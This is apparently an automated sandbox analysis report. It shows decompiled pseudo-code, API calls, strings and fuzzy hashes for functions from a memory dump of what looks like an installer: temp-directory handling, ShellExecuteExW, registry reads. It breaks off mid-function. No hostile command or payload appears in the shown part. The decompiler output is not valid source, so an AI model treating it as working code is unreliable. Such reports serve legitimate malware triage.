                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageNotifySend
                                                                    • String ID: (\m$MS PGothic
                                                                    • API String ID: 3556456075-219475269
                                                                    • Opcode ID: 2500a480fbb503b296a3365eb03bbe38222c632a9ea8e700226d7071bd3521c7
                                                                    • Instruction ID: c4b29eded5dd607060819086577383edb80d612be209ecb45f272f1b38c29540
                                                                    • Opcode Fuzzy Hash: 2500a480fbb503b296a3365eb03bbe38222c632a9ea8e700226d7071bd3521c7
                                                                    • Instruction Fuzzy Hash: 295150347011448BC700FF69D88AE5A77E3EB9A308B54557AF4049F366CA7AEC42CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060D530, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 73%
                                                                    			E0060D530(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x60d629);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E005C75E4( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E0060D294(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E0040B278(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E005CD508(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E0042302C( &_v36, _t54, 0);
						_v24 = _v36;
						E005C857C(_t54,  &_v40);
						_v20 = _v40;
						E005CD4D8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E00429008(_v16, 1);
						E004098C4();
					}
				}
				E0040A5A8(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E0060D630);
				E0040A228( &_v40, 3);
				return E0040A228( &_v16, 3);
			}


















                                                                    0x0060d530
                                                                    0x0060d530
                                                                    0x0060d531
                                                                    0x0060d533
                                                                    0x0060d538
                                                                    0x0060d538
                                                                    0x0060d53a
                                                                    0x0060d53c
                                                                    0x0060d53c
                                                                    0x0060d53f
                                                                    0x0060d540
                                                                    0x0060d542
                                                                    0x0060d544
                                                                    0x0060d546
                                                                    0x0060d547
                                                                    0x0060d54c
                                                                    0x0060d54f
                                                                    0x0060d552
                                                                    0x0060d559
                                                                    0x0060d561
                                                                    0x0060d568
                                                                    0x0060d578
                                                                    0x0060d57f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0060d586
                                                                    0x0060d588
                                                                    0x0060d58e
                                                                    0x0060d59e
                                                                    0x0060d5a6
                                                                    0x0060d5b2
                                                                    0x0060d5ba
                                                                    0x0060d5c2
                                                                    0x0060d5ca
                                                                    0x0060d5d9
                                                                    0x0060d5de
                                                                    0x0060d5e8
                                                                    0x0060d5ed
                                                                    0x0060d5ed
                                                                    0x0060d58e
                                                                    0x0060d5fc
                                                                    0x0060d601
                                                                    0x0060d603
                                                                    0x0060d606
                                                                    0x0060d609
                                                                    0x0060d616
                                                                    0x0060d628

                                                                    APIs
                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D578
                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,0060D629,?,006D579C,?,00000003,00000000,00000000,?,006AC8F3,00000000,006ACA22), ref: 0060D581
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateDirectoryErrorLast
                                                                    • String ID: .tmp
                                                                    • API String ID: 1375471231-2986845003
                                                                    • Opcode ID: 7e252bd83ff95b71af820973b8230fb04739544441579268b50ffd476fc0b7f1
                                                                    • Instruction ID: 90e89e80a8d15c693f6baa1c53929b57ef88e13b94ce627ec608a80cc6a9e7e5
                                                                    • Opcode Fuzzy Hash: 7e252bd83ff95b71af820973b8230fb04739544441579268b50ffd476fc0b7f1
                                                                    • Instruction Fuzzy Hash: F4219975A502089FDB05EBE4CC51EEEB7B9EB88304F10457AF901F3381DA75AE058B64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060F338, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 78%
                                                                    			E0060F338(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4, void* _a8, intOrPtr _a12, signed char _a16, char _a20) {
				intOrPtr _v8;
				struct _SHELLEXECUTEINFOW _v68;
				void* _t52;
				intOrPtr _t61;
				void* _t65;
				intOrPtr* _t67;
				void* _t70;

				_v8 = __ecx;
				_t65 = __edx;
				_t52 = __eax;
				_t67 = _a4;
				E0040A2AC(_a20);
				_push(_t70);
				_push(0x60f41c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70 + 0xffffffc0;
				if(_a20 == 0) {
					E005C5378(_t65, __ecx,  &_a20);
					if(_a20 == 0) {
						E005C745C( &_a20);
					}
				}
				E00407760( &_v68, 0x3c);
				_v68.cbSize = 0x3c;
				_v68.fMask = 0x540;
				if(_t52 != 0) {
					_v68.lpVerb = E0040B278(_t52);
				}
				_v68.lpFile = E0040B278(_t65);
				_v68.lpParameters = E0040B278(_v8);
				_v68.lpDirectory = E0040B278(_a20);
				_v68.nShow = _a12;
				ShellExecuteExW( &_v68); // executed
				asm("sbb ebx, ebx");
				_t53 = _t52 + 1;
				if(_t52 + 1 != 0) {
					 *_t67 = 0x103;
					_t39 = _v68.hProcess;
					if(_v68.hProcess != 0) {
						E0060EFD8(_t39, _t53, _a16 & 0x000000ff, _t65, _t67, _t67); // executed
					}
				} else {
					 *_t67 = GetLastError();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0060F423);
				return E0040A1C8( &_a20);
			}










                                                                    0x0060f341
                                                                    0x0060f344
                                                                    0x0060f346
                                                                    0x0060f348
                                                                    0x0060f34e
                                                                    0x0060f355
                                                                    0x0060f356
                                                                    0x0060f35b
                                                                    0x0060f35e
                                                                    0x0060f365
                                                                    0x0060f36c
                                                                    0x0060f375
                                                                    0x0060f37a
                                                                    0x0060f37a
                                                                    0x0060f375
                                                                    0x0060f389
                                                                    0x0060f38e
                                                                    0x0060f395
                                                                    0x0060f39e
                                                                    0x0060f3a7
                                                                    0x0060f3a7
                                                                    0x0060f3b1
                                                                    0x0060f3bc
                                                                    0x0060f3c7
                                                                    0x0060f3cd
                                                                    0x0060f3d4
                                                                    0x0060f3dc
                                                                    0x0060f3de
                                                                    0x0060f3e1
                                                                    0x0060f3ec
                                                                    0x0060f3f2
                                                                    0x0060f3f7
                                                                    0x0060f401
                                                                    0x0060f401
                                                                    0x0060f3e3
                                                                    0x0060f3e8
                                                                    0x0060f3e8
                                                                    0x0060f408
                                                                    0x0060f40b
                                                                    0x0060f40e
                                                                    0x0060f41b

                                                                    APIs
                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0060F3D4
                                                                    • GetLastError.KERNEL32(00000000,0060F41C,?,?,?,00000001), ref: 0060F3E3
                                                                      • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DirectoryErrorExecuteLastShellSystem
                                                                    • String ID: <
                                                                    • API String ID: 893404051-4251816714
                                                                    • Opcode ID: 0678bdbd1187e75fdc35b9897c4aaad201bcc0a8432d3eaa275722f57812bcfb
                                                                    • Instruction ID: dcf8102ceadd4487f49ba87b12be971fda6b0883f73445cbcbdd13ac2b4765a0
                                                                    • Opcode Fuzzy Hash: 0678bdbd1187e75fdc35b9897c4aaad201bcc0a8432d3eaa275722f57812bcfb
                                                                    • Instruction Fuzzy Hash: 6C216D70A40209DFDB24EFA5C885ADE7BE9EF58394F50003AF800E7691E77899518B98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006ACB10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 70%
                                                                    			E006ACB10(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char* _t12;
				long _t13;
				void* _t15;
				void* _t22;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t29;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_t22 = __ebx;
				_push(0);
				_push(_t35);
				_push(0x6acba2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				E006255B8(0);
				E006255A4(0);
				if( *0x6d6530 != 0) {
					_t12 =  *0x6cdfdc; // 0x6d62e4
					if( *_t12 != 0) {
						E0061583C(0);
					}
					_t13 = GetTickCount();
					_t29 =  *0x6d6530; // 0x0
					_t15 = E0060DCC8(0, _t22, 1, _t29, _t13, E006ACABC, 0, 0, 1, 1); // executed
					if(_t15 == 0) {
						_t26 =  *0x6d6530; // 0x0
						E0040B4C8( &_v8, _t26, L"Failed to remove temporary directory: ");
						E00616130(_v8, _t22, _t31, _t32);
					}
				}
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E006ACBA9);
				return E0040A1C8( &_v8);
			}














                                                                    0x006acb10
                                                                    0x006acb10
                                                                    0x006acb10
                                                                    0x006acb13
                                                                    0x006acb17
                                                                    0x006acb18
                                                                    0x006acb1d
                                                                    0x006acb20
                                                                    0x006acb25
                                                                    0x006acb2c
                                                                    0x006acb38
                                                                    0x006acb3a
                                                                    0x006acb42
                                                                    0x006acb46
                                                                    0x006acb46
                                                                    0x006acb58
                                                                    0x006acb60
                                                                    0x006acb68
                                                                    0x006acb6f
                                                                    0x006acb74
                                                                    0x006acb7f
                                                                    0x006acb87
                                                                    0x006acb87
                                                                    0x006acb6f
                                                                    0x006acb8e
                                                                    0x006acb91
                                                                    0x006acb94
                                                                    0x006acba1

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CountTick
                                                                    • String ID: Failed to remove temporary directory: $bm
                                                                    • API String ID: 536389180-2673898769
                                                                    • Opcode ID: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                                    • Instruction ID: 78e05ed3d0f448852bd59dbbb99a4cbd83d81d15065c7e17e95d6b7c04c680f0
                                                                    • Opcode Fuzzy Hash: bfd70c40cb1ad8d181033c251dcb3b43325d86ef4477ff23258a823bd8f54122
                                                                    • Instruction Fuzzy Hash: 9401D430610704AAD751FB75EC47F9A73979B46B10F51046AF500A72D2D7769C40CA28
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AC180, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E006AC180() {
				void* _v8;
				void* __ecx;
				void* _t9;
				long _t15;
				void* _t16;

				if( *0x6d67dd == 0) {
					_t16 = 0;
				} else {
					_t16 = 2;
				}
				_t9 = E005C7A14(_t16,  *((intOrPtr*)(0x6cd7ec + ( *0x6d67dc & 0x000000ff) * 4)), 0x80000002,  &_v8, 1, 0); // executed
				if(_t9 == 0) {
					E005C793C();
					E005C793C();
					_t15 = RegCloseKey(_v8); // executed
					return _t15;
				}
				return _t9;
			}








                                                                    0x006ac18c
                                                                    0x006ac192
                                                                    0x006ac18e
                                                                    0x006ac18e
                                                                    0x006ac18e
                                                                    0x006ac1b1
                                                                    0x006ac1b8
                                                                    0x006ac1c7
                                                                    0x006ac1d9
                                                                    0x006ac1e2
                                                                    0x00000000
                                                                    0x006ac1e2
                                                                    0x006ac1ea

                                                                    APIs
                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006AC56B,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006), ref: 006AC1E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID: RegisteredOrganization$RegisteredOwner
                                                                    • API String ID: 3535843008-1113070880
                                                                    • Opcode ID: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                                    • Instruction ID: ca4fc0b31771868649da923643cba903dbb3fbd6f1f7080981924f9495942079
                                                                    • Opcode Fuzzy Hash: bd898d473dd1f21ff1d6f1f73f3955f0af61235c1559c7df92e3e59f0577a32c
                                                                    • Instruction Fuzzy Hash: E8F09030744108AFE700EAD4DC56BAA7B9FE787714F60106AF1008BB82C630AE00CF54
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00414DA0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00414DA0(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00407404();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E004073F4(_t13);
				return _t24;
			}








                                                                    0x00414da7
                                                                    0x00414dac
                                                                    0x00414dae
                                                                    0x00414ddf
                                                                    0x00414de8
                                                                    0x00414df4

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID: TWindowDisabler-Window
                                                                    • API String ID: 716092398-1824977358
                                                                    • Opcode ID: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                                    • Instruction ID: a9fb6cbc93b7d8fca137cee03195aa1e05eb631c50c99d8148995e53eb0ae486
                                                                    • Opcode Fuzzy Hash: b8b775b51f73ca30bac71de3a5aa2dd226752c973776daaf732847dd1bb66243
                                                                    • Instruction Fuzzy Hash: 7BF092B2604158BF9B80DE9DDC81EDB77ECEB4D2A4B05416AFA0CE3201D634ED118BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AC0D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E006AC0D0(void* __eax, void* __edx, void* __eflags) {
				void* _v8;
				void* __ecx;
				void* _t7;
				void* _t17;
				void* _t24;

				_t24 = _t17;
				_t7 = E005C7A14(__eax, L"Software\\Microsoft\\Windows\\CurrentVersion", 0x80000002,  &_v8, 1, 0); // executed
				if(_t7 != 0) {
					return E0040A1C8(_t24);
				}
				if(E005C793C() == 0) {
					E0040A1C8(_t24);
				}
				return RegCloseKey(_v8);
			}








                                                                    0x006ac0d7
                                                                    0x006ac0f1
                                                                    0x006ac0f8
                                                                    0x00000000
                                                                    0x006ac11e
                                                                    0x006ac108
                                                                    0x006ac10c
                                                                    0x006ac10c
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,006B813A,?,006AC32E,00000000,006AC586,?,00000000,00000000), ref: 006AC115
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 006AC0E7
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseOpen
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                    • API String ID: 47109696-1019749484
                                                                    • Opcode ID: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                                    • Instruction ID: 9fe961e3a0f1dd2c49f778430c2599f74e8698f8579e7211867226b13b49c2b0
                                                                    • Opcode Fuzzy Hash: d229eceb27129c019e3bbbd4ff4b76b51703ff84893012891c3f6baec18ca04a
                                                                    • Instruction Fuzzy Hash: 8FF082317042186BEA04B69E6C52BAEA69D9B86764F60007EF608D7283D9A49E0107A9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005C7A14, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005C7A14(void* __eax, short* __ecx, void* __edx, void** _a4, int _a8, int _a12) {
				long _t7;
				short* _t8;
				void* _t9;
				int _t10;

				_t9 = __edx;
				_t8 = __ecx;
				_t10 = _a8;
				if(__eax == 2) {
					_t10 = _t10 | 0x00000100;
				}
				_t7 = RegOpenKeyExW(_t9, _t8, _a12, _t10, _a4); // executed
				return _t7;
			}







                                                                    0x005c7a14
                                                                    0x005c7a14
                                                                    0x005c7a18
                                                                    0x005c7a1d
                                                                    0x005c7a1f
                                                                    0x005c7a1f
                                                                    0x005c7a30
                                                                    0x005c7a37

                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                                    Strings
                                                                    • Control Panel\Desktop\ResourceLocale, xrefs: 005C7A2E
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Open
                                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                                    • API String ID: 71445658-1109908249
                                                                    • Opcode ID: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                                    • Instruction ID: f7a531ddb9cdcc56bc9141aac83b8570c2bea4ceb2af7b348951fcc1ebd06380
                                                                    • Opcode Fuzzy Hash: 06a7132f66d0f60adfa239dc575e30208fbe0ee06a5a11f688fbfd3b74e0f472
                                                                    • Instruction Fuzzy Hash: C3D0C97291022C7B9B009ED9DC41EFB7B9DEB19360F40845AFD0897100C2B4EDA18BF4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060DCC8, Relevance: 3.2, APIs: 2, Instructions: 192fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E0060DCC8(signed int __eax, void* __ebx, char __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int _a16, signed int _a20, char _a24) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v17;
				intOrPtr _v24;
				char _v25;
				signed int _v26;
				void* _v32;
				struct _WIN32_FIND_DATAW _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v640;
				signed char _t106;
				signed char _t108;
				void* _t114;
				int _t122;
				signed int _t127;
				signed char _t135;
				signed char _t139;
				void* _t155;
				signed int _t158;
				intOrPtr _t177;
				intOrPtr _t187;
				void* _t201;
				void* _t202;
				intOrPtr _t203;

				_t159 = __ecx;
				_t201 = _t202;
				_t203 = _t202 + 0xfffffd84;
				_push(__ebx);
				_v640 = 0;
				_v636 = 0;
				_v632 = 0;
				_v628 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v25 = __ecx;
				_v24 = __edx;
				_v17 = __eax;
				_push(_t201);
				_push(0x60df66);
				_push( *[fs:eax]);
				 *[fs:eax] = _t203;
				_v26 = 1;
				if(_a24 == 0) {
					L26:
					__eflags = _a16 & 0x000000ff ^ 0x00000001 | _v26;
					if((_a16 & 0x000000ff ^ 0x00000001 | _v26) != 0) {
						__eflags = _v25;
						if(_v25 != 0) {
							__eflags = _a12;
							if(__eflags == 0) {
